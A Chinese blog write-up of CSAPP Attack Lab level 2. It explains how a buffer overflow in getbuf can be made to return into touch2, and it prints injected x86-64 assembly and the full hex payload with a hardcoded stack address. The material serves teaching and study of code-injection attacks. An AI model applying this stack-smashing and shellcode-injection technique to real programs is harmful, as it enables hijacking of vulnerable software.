CSAPP:Lab3 -AttackLab-Level2

已于 2024-08-27 21:30:13 修改
阅读量574 收藏 4
点赞数 10
分类专栏: # CSAPP 文章标签: csapp 计算机体系结构 汇编
于 2024-08-27 21:03:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33811080/article/details/141609921
版权

1.实验任务

phase2需要我们注入一小段代码。来完成字符串漏洞攻击

touch2的代码如下

 void touch2(unsigned val)
 {  
     vlevel = 2; /* Part of validation protocol */ 
     if (val == cookie) {
         printf("Touch2!: You called touch2(0x%.8x)\n", val);
         validate(2);
     } else {
         printf("Misfire: You called touch2(0x%.8x)\n", val);
         fail(2);
     }
     exit(0);
 }

 本题的任务就是要我们在getbuf()之后直接ret到touch2()里面而不是继续执行test,大概任务目的和第一个基本一样,但是方式略有不同

 2.分析touch2()汇编代码

00000000004017ec <touch2>:
  4017ec:	48 83 ec 08          	sub    $0x8,%rsp
  4017f0:	89 fa                	mov    %edi,%edx
  4017f2:	c7 05 e0 2c 20 00 02 	movl   $0x2,0x202ce0(%rip)        # 6044dc <vlevel>
  4017f9:	00 00 00 
  4017fc:	3b 3d e2 2c 20 00    	cmp    0x202ce2(%rip),%edi        # 6044e4 <cookie>
  401802:	75 20                	jne    401824 <touch2+0x38>
  401804:	be e8 30 40 00       	mov    $0x4030e8,%esi
  401809:	bf 01 00 00 00       	mov    $0x1,%edi
  40180e:	b8 00 00 00 00       	mov    $0x0,%eax
  401813:	e8 d8 f5 ff ff       	call   400df0 <__printf_chk@plt>
  401818:	bf 02 00 00 00       	mov    $0x2,%edi
  40181d:	e8 6b 04 00 00       	call   401c8d <validate>
  401822:	eb 1e                	jmp    401842 <touch2+0x56>
  401824:	be 10 31 40 00       	mov    $0x403110,%esi
  401829:	bf 01 00 00 00       	mov    $0x1,%edi
  40182e:	b8 00 00 00 00       	mov    $0x0,%eax
  401833:	e8 b8 f5 ff ff       	call   400df0 <__printf_chk@plt>
  401838:	bf 02 00 00 00       	mov    $0x2,%edi
  40183d:	e8 0d 05 00 00       	call   401d4f <fail>
  401842:	bf 00 00 00 00       	mov    $0x0,%edi
  401847:	e8 f4 f5 ff ff       	call   400e40 <exit@plt>

可以看到, 代码中第二行是获取参数(参数由调用函数通过%edi传入),第五行,通过指令0x202ce2(%rip),%edi,这里其实是用我们的参数值和cookie值进行比较,如果相等就通过了。

所以,level2解题的关键是,getbuf()返回时能转移到touch2(),并且在转移之前,把cookie的值mov到%rdi寄存器中,最后代码控制权ret到touch2()时就能正常向下执行了。

3.实现思路 

我们是利用缓冲区溢出攻击,容易想到,我们输入的字符串形成一段汇编代码,该代码如下,功能实现的即是我们想要的效果,修改%rdi寄存器的值,然后将touch2()的代码地址压栈,再弹栈,跳转到touch2()执行。

movq    $0x59b997fa, %rdi
pushq   $0x4017ec
ret

 我们需要将该断汇编代码,转变成字节序列

gcc -c ./level2.s

objdump -d level2.o

剩下的问题变成了,将该汇编代码字节序列放在什么位置。

同level1一样,利用缓冲区溢出,getbuf返回地址要修改,可以利用getbuf创建的40字节缓冲区,将栈顶地址即%rsp的内容,放到getbuf()的返回地址处,然后我们自己构造的三行汇编代码字节序列,放在%rsp栈顶位置处,当getbuf()返回时,返回到图中%rsp指示的位置,然后执行我们自己构造的汇编代码,该汇编代码跳转到touch2()执行。

查看getbuf()代码,我们要获取执行getbuf时的%rsp栈顶位置值。

如下图,再mov %rsp %rdi指令处打断点

查看此时$rsp寄存器内容

得到$rsp=0x5561dc78,构造输入文件(小端方式)

48 c7 c7 fa 97 b9 59 68    //构造的汇编代码
ec 17 40 00 c3 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00    //栈顶位置

4.测试

可以正常通过

补充一点,有些人问为什么要把栈顶位置放到getbuf()的返回地址处,%rsp还是个固定的值0x5561dc78,如果下一次程序运行,栈不在此处了怎么办。这里有一个前提条件,如下图,作者这里提到了,前三关,没有用到程序布局随机化技术(不然这个实验也没法做了),我们堆栈每次运行栈顶位置都是一致的。

星辰大Hai
关注
专栏目录
CSAPP 缓冲区溢出实验
poptar的博客
06-06 2017
实验5 缓冲区溢出实验 一、实验目的 1、深入了解缓冲区溢出的隐患,了解如何利用缓冲区溢出这个漏洞对现有程序进行控制流劫持、执行非法程序代码,从而造成对程序进行攻击以及破坏的过程; 2、增强对程序机器级表示、汇编语言、调试器和逆向工程等理解。 二、实验内容 对目标程序实施缓冲区溢出攻击,通过造成缓冲区溢出来破坏目标程序的栈帧结构,继而...
csapp attack lab level2
qq_25044201的博客
12-06 318
完成了level1,现在来看看level2. 这是讲义上touch2函数 void touch2(unsigned val) { vlevel = 2; /* Part of validation protocol */ if (val == cookie) { printf("Touch2!: You called touch2(0x%.8x)\n", val); validate(2); } else { printf("Misfire: You ca
CSAPP3e - x86-64 assembly code analysis - Attack Lab: Level II
Jason ZHANG的博客
06-11 2366
这一部分要求我使用ROP的方法来攻击rtarget这个程序。rtarget增加了一些现代的保护手段,例如随机产生rsp的地址,这使得我无法预测每次run的时候栈帧的位置,从而不能像PART I level2中那样预测到rsp的位置注入exploit code。退一步说,就算我成功注入了,还有金丝雀保护机制(canary)来确定某些位置的值是否发生变化,以及直接规定某些存储区域是不可执行(inexe
CSAPP:Lab3 -AttackLab-Level1
星辰大海的博客
08-27 880
关于测试环境的问题,也许是不同虚拟机环境不同,导致实验程序的兼容性出现了问题,如下图,我按照实验手册中说明的控制台进行输入的方法测试,没有办法进行输入,直接会报错。的开始地址,放在某个位置(test进行call getbuf()指令前,要将该指令的下一指令地址压栈,此时的压入栈帧中的位置,就是我们要修改的位置),以实现当。代码开始通过$rsp-40创建了40个字节的栈帧空间,然后将栈顶地址赋给rdi,调用Gets()进行输入,输入字符放到此40字节的缓冲区中。验证过,是可行的,如下图。
[笔记]计算机基础 4 CSAPP Lab3-AttackLab
Leafing_的博客
04-06 802
总结想说的貌似都在BombLab里说了,只能鼓励自己继续读第4章了。
CSAPP Lab3 - attacklab
GAUSS2021
07-30 644
文章目录Lab3 - attacklabPart I: Code Injection AttacksLevel 1Level 2Level 3Part II: Return-Oriented ProgrammingLevel 2Level 3 Lab3 - attacklab 仔细阅读官网上的说明指南,以下任务均是由指南发布的。 Part I: Code Injection Attacks objdump -d ctarget > ctarget.asm Level 1 第一部分无需注入代码,只需令
CSAPP(CMU 15-213):Lab3 Attacklab详解
qq_42241839的博客
02-02 4279
# 前言 本系列文章意在记录答主学习CSAPP Lab的过程,也旨在可以帮助后人一二,欢迎大家指正! tips:本lab主要是利用gets中的不安全(越界,覆盖原栈桢内容),缺陷来进行攻击(缓冲区溢出) Part I : Code Injection Attacks ​ 第一部分是利用代码注入进行攻击,CMU15-213将ctarget关闭了栈随机化并且将栈标记为可执行的,以简化难度,让代码更容易被攻击。 Phase 1 目标:使test函数再调用getbuf()之后不返回自身,而是转移至touch
CSAPP-Lab3_attacklab
2401_84974736的博客
05-20 704
最近学校布置了attacklab的相关实验作业,每个人定制一个target,可以利用objdump,gdb等作为辅助工具进行实验。
CSAPP-Lab3:AttackLab
qq_39308644的博客
05-24 527
CSAPP:AttackLab
CSAPP-LAB3-Attack
Dallas01的博客
02-20 1391
文章目录00 PrerequisitePart 1: Code injection1.1 phase_11.2 phase_21.3 phase_3Part2: Returned-Oriented Programming2.1 phase_42.2 Phase_5 00 Prerequisite 听见课堂上老爷子说: But to be a good person you also know what the bet have to know what the bad people do, so part
CMU_CSAPP_LAB3_ATTACKLAB
AI_lalaland的博客
03-28 1103
本实验要仔细阅读对应的 write up ,上面给了大量的提示信息,主要是介绍两种攻击方式,分两部分,第一部分的方式对于现代计算机已经基本无效了,第二部分的方式过程比较繁杂,不过原理还是很容易理解的。实验的主要目的还是熟悉计算机的程序控制方式、函数栈帧的结构,以及熟练使用 dbg 和 objdump 工具进行调试。 本文讲解较少,可参照其他博客,有一些写的很好,附图讲解,思路清晰。 本文对实验...
CSAPP:Attack Lab —— 缓冲区溢出攻击实验
热门推荐
-Silvia、
06-05 4万+
CSAPP:Attack Lab —— 缓冲区溢出攻击实验 X86-64寄存器和栈帧 Part I:Code Injection Attacks Part II:Return-Oriented Programming Attacks
CSAPP3e - x86-64 assembly code analysis - Attack Lab: Level I
Jason ZHANG的博客
06-10 4676
这个lab的目的在于进一步分析汇编码。由于冯氏体系下数据和程序代码都以二进制存储,而且某些不安全的代码可能会在扫描缓冲区时跨越边界,改变一些不应当改变的值,这就给了著名的buffer overflow attack机会。先期知识:最好搞清楚函数调用的机制,弄明白rsp的值和其指向的值到底是什么 PART 1要求我使用经典的buffer overflow attack插入我自己的exploit c
CSAPP实验(三)——attacklab
haha123486的博客
05-21 6552
phase_1 使用objdump -d ctarget > ctarget.dis命令把可执行程序ctarget的反汇编代码保存到ctarget.dis文件里。再用vim打开ctarget.dis文件,从中得到下图。图中可知,函数touch1的起始地址在0x4017c0。 下图是getbuf的汇编代码,首先分配了40(0x28)个字节的栈空间。也就是说当输入字符串大于40个字节时会覆盖函数getbuf的返回地址。 建立exploit1.txt,具体内容如下图所示。需要注意的是采用小端字节排序。
masm汇编debug调试1~100求和
zzj的博客
11-03 170
计算1+2+3+...+100并把结果放到寄存器AX里。
32位汇编——通用寄存器
m0_73645464的博客
11-01 1098
主要介绍了通用寄存器的概念及其在CPU中的作用,包括其大小与CPU位数的关系。视频还解释了为何现代学习仍需涵盖32位CPU及汇编知识,并介绍了32位CPU中的八种通用寄存器(eax, ecx, edx, ebx, esp, ebp, esi, edi)。最后,简要提及了move指令作为数据移动的基本操作,强调了汇编语言学习的关键点在于理解寄存器、内存与指令之间的关系。
masm汇编字符串输出演示
最新发布
zzj的博客
11-03 140
【代码】masm字符串输出演示。
masm汇编debug调试字符串大小写转换演示
zzj的博客
11-03 164
把“Hello World”这行字符串全部转换为大写。
"CSAPP-lab3-缓冲区溢出攻击实验报告总结
【BUPT计算机系统基础】CSAPP-lab3-缓冲区溢出攻击实验总结 本次实验的主要目的是通过进行缓冲区溢出攻击,来加深对C语言程序的机器级表示、GDB调试器的用法、x86-64机器代码生成以及软件漏洞危害的理解。实验的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值